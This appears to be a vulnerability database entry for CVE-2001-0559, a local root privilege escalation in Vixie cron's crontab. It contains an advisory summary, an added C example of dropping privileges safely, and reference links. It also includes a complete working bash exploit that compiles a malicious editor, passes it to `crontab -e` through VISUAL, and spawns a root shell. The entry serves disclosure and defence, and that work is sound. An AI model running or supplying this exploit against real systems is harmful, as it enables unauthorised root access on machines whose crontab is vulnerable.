Vixie cron Privilege Escalation Vulnerability

Vulnerability ID 1106339 Vulnerability type Unknown
Published 2001-05-07 Updated 2005-05-02
CVE ID CVE-2001-0559
CNNVD-ID CNNVD-200108-066
Platform Linux CVSS score 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/20822
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-066
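|Vulnerability details
crontab in Vixie cron 3.0.1 and earlier does not properly drop privileges after a failed parse of a modification operation. A local attacker can gain additional privileges when an editor is invoked to correct the error.
|Exploit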
source: http://www.securityfocus.com/bid/2687/info

Vixie cron is an implementation of the popular UNIX program that runs user-specified programs at periodic scheduled times.

When a parsing error occurs after a modification operation, crontab will fail to drop privileges correctly for subsequent modification operations.

This vulnerability may be exploited to gain root privileges locally. 
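
The defensive counterpart to the flaw described above is to drop privileges permanently, and verify the drop, in the child process before every editor invocation, including the retry after a parse error. The C program below is an added example, not Vixie cron source code or a vendor patch; the function names drop_privs_permanently and run_editor_unprivileged are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently give up setuid/setgid privileges. Returns 0 only when the
 * drop has been verified, so callers can fail closed. */
int drop_privs_permanently(void) {
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    /* Group first: once the uid is dropped, setgid() may be refused. */
    if (setgid(rgid) != 0 || setuid(ruid) != 0) return -1;
    if (geteuid() != ruid || getegid() != rgid) return -1;
    /* If root can be regained, the saved ids were not cleared. */
    if (ruid != 0 && setuid(0) == 0) return -1;
    return 0;
}

/* Run `editor path` in a child that drops privileges on every call, so a
 * second edit pass after a parse error is treated exactly like the first.
 * Returns the editor's exit status, 126 if the drop failed, 127 if exec
 * failed, -1 on fork/wait errors. */
int run_editor_unprivileged(const char *editor, const char *path) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (drop_privs_permanently() != 0) _exit(126); /* never exec privileged */
        execlp(editor, editor, path, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

int main(int argc, char **argv) {
    const char *editor = getenv("VISUAL"); /* variable used with crontab -e */
    if (argc != 2) {
        fprintf(stderr, "usage: %s FILE\n", argv[0]);
        return 2;
    }
    if (editor == NULL || *editor == '\0') editor = "vi";
    int rc = run_editor_unprivileged(editor, argv[1]);
    if (rc != 0) fprintf(stderr, "editor step failed (%d)\n", rc);
    return rc == 0 ? 0 : 1;
}
```
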

#!/bin/bash

clear
echo ".-----------------------------------------------------------."
echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |"
echo "|===========================================================|"
echo "| Sebastian Krahmer <[email protected]>                   |"
echo "| Michal Zalewski <[email protected]>                     |"
echo "\`-----------------------------------------------------------'"
echo

test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab

echo    ">>> Using binary:  $CRONBIN"
echo -n ">>> Setuid check:  "

if [ -u $CRONBIN ]; then
  echo "PASSED"
else
  echo "FAILED"
  echo
  exit 1
fi

echo -n ">>> Version check: "

QQ=`strings $CRONBIN | grep '43 vixie Exp'`

if [ "$QQ" = "" ]; then
  echo "FAILED"
  echo
  exit 1
else
  echo "PASSED"
fi

echo ">>> Building exploit..."

cat >edit0r.c <<_eof_
#include <stdio.h>
int main(int argc,char* argv[]) {
  sleep(1);
  if (geteuid()) {
    FILE* x=fopen(argv[1],"w");
    fprintf(x,"blah blah blah\n");
    fclose(x);
  } else {
    dup2(1,0);
    dup2(1,2);
    printf("\n>>> Entering rootshell, babe...\n");
    system("touch $HOME/.xploited");
    system("bash");
  }
}
_eof_

gcc edit0r.c -o edit0r &>/dev/null
rm -f edit0r.c

if [ ! -f edit0r ]; then
  echo ">>> Cannot compile exploit."
  echo
  exit 1
fi

rm -f ~/.xploited

echo ">>> Performing attack..."

( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null

rm -f edit0r

if [ -f ~/.xploited ]; then
  echo
  echo ">>> Thank you."
  rm -f ~/.xploited
  echo
  exit 0
else
  echo
  echo ">>> Apparently I am not able to exploit it, sorry..."
  echo
  exit 1
fi
|References

Source: BID
Name: 2687
Link: http://www.securityfocus.com/bid/2687
Source: BUGTRAQ
Name: 20010507 Vixie cron vulnerability
Link: http://www.securityfocus.com/archive/1/183029
Source: MANDRAKE
Name: MDKSA-2001:050
Link: http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-050.php3
Source: DEBIAN
Name: DSA-054
Link: http://www.debian.org/security/2001/dsa-054
Source: XF
Name: vixie-cron-gain-privileges(6508)
Link: http://xforce.iss.net/static/6508.php
Source: SUSE
Name: SuSE-SA:2001:17
Link: http://www.novell.com/linux/security/advisories/2001_017_cron_txt.html